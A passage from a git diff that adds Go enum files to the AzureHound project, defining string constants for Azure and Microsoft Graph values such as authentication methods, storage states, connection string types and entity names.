+// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AgeGroup string + +const ( + AgeGroupMinor AgeGroup = "minor" + AgeGroupNotAdult AgeGroup = "notAdult" + AgeGroupAdult AgeGroup = "adult" +) diff --git a/enums/allowedcopyscope.go b/enums/allowedcopyscope.go new file mode 100644 index 0000000..aee00fe --- /dev/null +++ b/enums/allowedcopyscope.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AllowedCopyScope string + +const ( + AADScope AllowedCopyScope = "AAD" + PrivateLinkScope AllowedCopyScope = "PrivateLink" +) diff --git a/enums/auth-method.go b/enums/auth-method.go new file mode 100644 index 0000000..7801685 --- /dev/null +++ b/enums/auth-method.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AuthMethod = string + +const ( + Certificate string = "Certificate" + Secret string = "Client Secret" + UsernamePassword string = "Username and Password" +) + +func AuthMethods() []AuthMethod { + return []AuthMethod{ + Certificate, + Secret, + UsernamePassword, + } +} diff --git a/enums/auto_heal_action_type.go b/enums/auto_heal_action_type.go new file mode 100644 index 0000000..1a8021c --- /dev/null +++ b/enums/auto_heal_action_type.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AutoHealActionType string + +const ( + CustomActionType AutoHealActionType = "CustomAction" + LogEventActionType AutoHealActionType = "LogEvent" + RecycleActionType AutoHealActionType = "Recycle" +) diff --git a/enums/automation_account_identity_type.go b/enums/automation_account_identity_type.go new file mode 100644 index 0000000..1f1c970 --- /dev/null +++ b/enums/automation_account_identity_type.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AutomationAccountIdentityType string + +const ( + ApplicationIdentityType AutomationAccountIdentityType = "Application" + KeyIdentityType AutomationAccountIdentityType = "Key" + ManagedIdentityType AutomationAccountIdentityType = "ManagedIdentity" + UserIdentityType AutomationAccountIdentityType = "User" +) diff --git a/enums/automation_account_state.go b/enums/automation_account_state.go new file mode 100644 index 0000000..767fa71 --- /dev/null +++ b/enums/automation_account_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AutomationAccountState string + +const ( + OkState AutomationAccountState = "Ok" + SuspendedState AutomationAccountState = "Suspended" + UnavailableState AutomationAccountState = "Unavailable" +) diff --git a/enums/autoreplystatus.go b/enums/autoreplystatus.go new file mode 100644 index 0000000..99aba3b --- /dev/null +++ b/enums/autoreplystatus.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AutoReplyStatus string + +const ( + AutoReplyStatusDisabled AutoReplyStatus = "disabled" + AutoReplyStatusAlwaysEnabled AutoReplyStatus = "alwaysEnabled" + AutoReplyStatusScheduled AutoReplyStatus = "scheduled" +) diff --git a/enums/azure_storage_state.go b/enums/azure_storage_state.go new file mode 100644 index 0000000..be27526 --- /dev/null +++ b/enums/azure_storage_state.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AzureStorageState string + +const ( + InvalidCredentialsStorageState AzureStorageState = "InvalidCredentials" + InvalidShareStorageState AzureStorageState = "InvalidShare" + NotValidatedStorageState AzureStorageState = "NotValidated" + OkStorageState AzureStorageState = "Ok" +) diff --git a/enums/azure_storage_type.go b/enums/azure_storage_type.go new file mode 100644 index 0000000..db8c142 --- /dev/null +++ b/enums/azure_storage_type.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AzureStorageType string + +const ( + AzureBlobStorageType AzureStorageType = "AzureBlob" + AzureFilesStorageType AzureStorageType = "AzureFiles" +) diff --git a/enums/blob_restore_progress_status.go b/enums/blob_restore_progress_status.go new file mode 100644 index 0000000..1215fb6 --- /dev/null +++ b/enums/blob_restore_progress_status.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type BlobRestoreProgressStatus string + +const ( + CompletedStatus BlobRestoreProgressStatus = "Complete" + FailedStatus BlobRestoreProgressStatus = "Failed" + InProgress BlobRestoreProgressStatus = "InProgress" +) diff --git a/enums/bypassoption.go b/enums/bypassoption.go new file mode 100644 index 0000000..917799d --- /dev/null +++ b/enums/bypassoption.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Tells what traffic can bypass network rules. This can be 'AzureServices' or 'None'. +// If not specified the default is 'AzureServices'. +type BypassOption string + +const ( + BypassOptionAzureServices BypassOption = "AzureServices" + BypassOptionNone BypassOption = "None" +) diff --git a/enums/capabiltystatus.go b/enums/capabiltystatus.go new file mode 100644 index 0000000..1e7c311 --- /dev/null +++ b/enums/capabiltystatus.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type CapabiltyStatus string + +const ( + // Available for normal use. + CapabiltyStatusEnabled CapabiltyStatus = "Enabled" + + // Available for normal use but is in a grace period. + CapabiltyStatusWarning CapabiltyStatus = "Warning" + + // Unavailable but any data associated with the capability must be preserved. + CapabiltyStatusSuspended CapabiltyStatus = "Suspended" + + // Unavailable and any data associated with the capability may be deleted. + CapabiltyStatusDeleted CapabiltyStatus = "Deleted" + + // Unavailable for all administrators and users but any data associated with the capability must be preserved. + CapabiltyStatusLockedOut CapabiltyStatus = "LockedOut" +) diff --git a/enums/client_cert_mode.go b/enums/client_cert_mode.go new file mode 100644 index 0000000..208aae2 --- /dev/null +++ b/enums/client_cert_mode.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ClientCertMode string + +const ( + OptionalClientCertMode ClientCertMode = "Optional" + OptionalInteractiveUserClientCertMode ClientCertMode = "OptionalInteractiveUser" + RequiredClientCertMode ClientCertMode = "Required" +) diff --git a/enums/connection_string_type.go b/enums/connection_string_type.go new file mode 100644 index 0000000..b5be93e --- /dev/null +++ b/enums/connection_string_type.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ConnectionStringType string + +const ( + ApiHubConnectionStringType ConnectionStringType = "ApiHub" + CustomConnectionStringType ConnectionStringType = "Custom" + DocDbConnectionStringType ConnectionStringType = "DocDb" + EventHubConnectionStringType ConnectionStringType = "EventHub" + MySqlConnectionStringType ConnectionStringType = "MySql" + NotificationHubConnectionStringType ConnectionStringType = "NotificationHub" + PostgreSQLConnectionStringType ConnectionStringType = "PostgreSQL" + RedisCacheConnectionStringType ConnectionStringType = "RedisCache" + SQLAzureConnectionStringType ConnectionStringType = "SQLAzure" + SQLServerConnectionStringType ConnectionStringType = "SQLServer" + ServiceBusConnectionStringType ConnectionStringType = "ServiceBus" +) diff --git a/enums/consentforminor.go b/enums/consentforminor.go new file mode 100644 index 0000000..eff3138 --- /dev/null +++ b/enums/consentforminor.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ConsentForMinor string + +const ( + // Consent has been obtained for the user to have an account. + ConsentForMinorGranted ConsentForMinor = "granted" + + // Consent has not been obtained for the user to have an account. + ConsentForMinorDenied ConsentForMinor = "denied" + + // The user is from a location that does not require consent. + ConsentForMinorNotRequired ConsentForMinor = "notRequired" +) diff --git a/enums/createmode.go b/enums/createmode.go new file mode 100644 index 0000000..cb8fd09 --- /dev/null +++ b/enums/createmode.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// The vault's create mode to indicate whether the vault need to be recovered or not. +type CreateMode string + +const ( + CreateModeDefault CreateMode = "default" + CreateModeRecover CreateMode = "recover" +) diff --git a/enums/creationtype.go b/enums/creationtype.go new file mode 100644 index 0000000..2b561ac --- /dev/null +++ b/enums/creationtype.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type CreationType string + +const ( + // User was created as an external account. + CreationTypeInvitation CreationType = "Invitation" + + // User was created as a local account for an Azure AD B2C tenant. + CreationTypeLocalAccount CreationType = "LocalAccount" + + // User was created through self-service sign-up by an internal user using email verification. + CreationTypeEmailVerified CreationType = "EmailVerified" + + // User was created through self-service sign-up by an external user signing up through a link that is part of a + // user flow. + CreationTypeSelfServiceSignUp CreationType = "SelfServiceSignUp" +) diff --git a/enums/dayofweek.go b/enums/dayofweek.go new file mode 100644 index 0000000..c61b08b --- /dev/null +++ b/enums/dayofweek.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type DayOfWeek string + +const ( + DayOfWeekMonday DayOfWeek = "monday" + DayOfWeekTuesday DayOfWeek = "tuesday" + DayOfWeekWednesday DayOfWeek = "wednesday" + DayOfWeekThursday DayOfWeek = "thursday" + DayOfWeekFriday DayOfWeek = "friday" + DayOfWeekSaturday DayOfWeek = "saturday" + DayOfWeekSunday DayOfWeek = "sunday" +) diff --git a/enums/deviceprofile.go b/enums/deviceprofile.go new file mode 100644 index 0000000..9f2c3ee --- /dev/null +++ b/enums/deviceprofile.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type DeviceProfile string + +const ( + DeviceProfileRegisteredDevice DeviceProfile = "RegisteredDevice" + DeviceProfileSecureVM DeviceProfile = "SecureVM" + DeviceProfilePrinter DeviceProfile = "Printer" + DeviceProfileShared DeviceProfile = "Shared" + DeviceProfileIoT DeviceProfile = "IoT" +) diff --git a/enums/directory_service_options.go b/enums/directory_service_options.go new file mode 100644 index 0000000..4d6b320 --- /dev/null +++ b/enums/directory_service_options.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type DirectoryServiceOptions string + +const ( + AADDSService DirectoryServiceOptions = "AADDS" + ADService DirectoryServiceOptions = "AD" + NoService DirectoryServiceOptions = "None" +) diff --git a/enums/dns_endpoint_type.go b/enums/dns_endpoint_type.go new file mode 100644 index 0000000..3404360 --- /dev/null +++ b/enums/dns_endpoint_type.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type DnsEndpointType string + +const ( + AzureDnsZone DnsEndpointType = "AzureDnsZone" + StandardZone DnsEndpointType = "Standard" +) diff --git a/enums/encryption_key_source_type.go b/enums/encryption_key_source_type.go new file mode 100644 index 0000000..638290f --- /dev/null +++ b/enums/encryption_key_source_type.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type EncryptionKeySourceType string + +const ( + AutomationSource EncryptionKeySourceType = "Microsoft.Automation" + KeyvaultSource EncryptionKeySourceType = "Microsoft.Keyvault" + StorageSource EncryptionKeySourceType = "Microsoft.Storage" +) diff --git a/enums/encryption_key_type.go b/enums/encryption_key_type.go new file mode 100644 index 0000000..fb5ccc8 --- /dev/null +++ b/enums/encryption_key_type.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type EncryptionKeyType string + +const ( + AccountKeyType EncryptionKeyType = "Account" + ServiceKeyType EncryptionKeyType = "Service" +) diff --git a/enums/endpointconnectionstatus.go b/enums/endpointconnectionstatus.go new file mode 100644 index 0000000..5d4a008 --- /dev/null +++ b/enums/endpointconnectionstatus.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// The private endpoint connection status. +type EndpointConnectionStatus string + +const ( + EndpointConnectionStatusApproved EndpointConnectionStatus = "Approved" + EndpointConnectionStatusDisconnect EndpointConnectionStatus = "Disconnected" + EndpointConnectionStatusPending EndpointConnectionStatus = "Pending" + EndpointConnectionStatusRejected EndpointConnectionStatus = "Rejected" +) diff --git a/enums/endpointprovisioningstate.go b/enums/endpointprovisioningstate.go new file mode 100644 index 0000000..d7a26b9 --- /dev/null +++ b/enums/endpointprovisioningstate.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// The private endpoint provisioning state. +type EndpointProvisioningState string + +const ( + EndpointProvisioningStateCreating EndpointProvisioningState = "Creating" + EndpointProvisioningStateDeleting EndpointProvisioningState = "Deleting" + EndpointProvisioningStateDisconnected EndpointProvisioningState = "Disconnected" + EndpointProvisioningStateFailed EndpointProvisioningState = "Failed" + EndpointProvisioningStateSucceeded EndpointProvisioningState = "Succeeded" + EndpointProvisioningStateUpdating EndpointProvisioningState = "Updating" +) diff --git a/enums/entity.go b/enums/entity.go new file mode 100644 index 0000000..63724f3 --- /dev/null +++ b/enums/entity.go @@ -0,0 +1,62 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type Entity = string + +const ( + EntityUser Entity = "#microsoft.graph.user" + EntityInvitation Entity = "#microsoft.graph.invitation" + EntityAppTemplate Entity = "#microsoft.graph.applicationTemplate" + EntityAuthMethodConfig Entity = "#microsoft.graph.authenticationMethodConfiguration" + EntityIdentityProvider Entity = "#microsoft.graph.identityProvider" + EntityApplication Entity = "#microsoft.graph.application" + EntityCertBasedAuthConfig Entity = "#microsoft.graph.certificateBasedAuthConfiguration" + EntityOrgContact Entity = "#microsoft.graph.orgContact" + EntityContract Entity = "#microsoft.graph.contract" + EntityDevice Entity = "#microsoft.graph.device" + EntityDirectoryObject Entity = "#microsoft.graph.directoryObject" + EntityDirectoryRole Entity = "#microsoft.graph.directoryRole" + EntityDirectoryRoleTemplate Entity = "#microsoft.graph.directoryRoleTemplate" + EntityDomainDNSRecord Entity = "#microsoft.graph.domainDnsRecord" + EntityDomain Entity = "#microsoft.graph.domain" + EntityGroup Entity = "#microsoft.graph.group" + EntityGroupSetting Entity = "#microsoft.graph.groupSetting" + EntityGroupSettingTemplate Entity = "#microsoft.graph.groupSettingTemplate" + EntityOrgBrandingLocalization Entity = "#microsoft.graph.organizationalBrandingLocalization" + EntityOAuth2PermissionGrant Entity = "#microsoft.graph.oAuth2PermissionGrant" + EntityOrganization Entity = "#microsoft.graph.organization" + EntityResourcePermissionGrant Entity = "#microsoft.graph.resourceSpecificPermissionGrant" + EntityScopedRoleMembership Entity = "#microsoft.graph.scopedRoleMembership" + EntityServicePrincipal Entity = "#microsoft.graph.servicePrincipal" + EntitySubscribedSku Entity = "#microsoft.graph.subscribedSku" + EntityPlace Entity = "#microsoft.graph.place" + EntityDrive Entity = "#microsoft.graph.drive" + EntitySharedDriveItem Entity = "#microsoft.graph.sharedDriveItem" + EntitySite Entity = "#microsoft.graph.site" + EntitySchemaExt Entity = "#microsoft.graph.schemaExtension" + EntityGroupLifecyclePolicy Entity = "#microsoft.graph.groupLifecyclePolicy" + EntityAgreementAcceptance Entity = "#microsoft.graph.agreementAcceptance" + EntityAgreement Entity = "#microsoft.graph.agreement" + EntityDataPolicyOperation Entity = "#microsoft.graph.dataPolicyOperation" + EntitySubscription Entity = "#microsoft.graph.subscription" + EntityExternalConnection Entity = "#microsoft.graph.externalConnection" + EntityChat Entity = "#microsoft.graph.chat" + EntityTeam Entity = "#microsoft.graph.team" + EntityTeamsTemplate Entity = "#microsoft.graph.teamsTemplate" +) diff --git a/enums/externalaudiencescope.go b/enums/externalaudiencescope.go new file mode 100644 index 0000000..614f642 --- /dev/null +++ b/enums/externalaudiencescope.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ExternalAudienceScope string + +const ( + ExternalAudienceScopeNone ExternalAudienceScope = "none" + ExternalAudienceScopeContactsOnly ExternalAudienceScope = "contactsOnly" + ExternalAudienceScopeAll ExternalAudienceScope = "all" +) diff --git a/enums/externaluserstate.go b/enums/externaluserstate.go new file mode 100644 index 0000000..2ce35da --- /dev/null +++ b/enums/externaluserstate.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ExternalUserState string + +const ( + ExternalUserStateAccepted ExternalUserState = "Accepted" + ExternalUserStatePendingAcceptance ExternalUserState = "PendingAcceptance" +) diff --git a/enums/ftps_state.go b/enums/ftps_state.go new file mode 100644 index 0000000..6567f80 --- /dev/null +++ b/enums/ftps_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type FtpsState string + +const ( + AllAllowedFtpsState FtpsState = "AllAllowed" + DisabledFtpsState FtpsState = "Disabled" + FtpsOnlyFtpsState FtpsState = "FtpsOnly" +) diff --git a/enums/generic_enabled_disabled.go b/enums/generic_enabled_disabled.go new file mode 100644 index 0000000..c148dbd --- /dev/null +++ b/enums/generic_enabled_disabled.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// 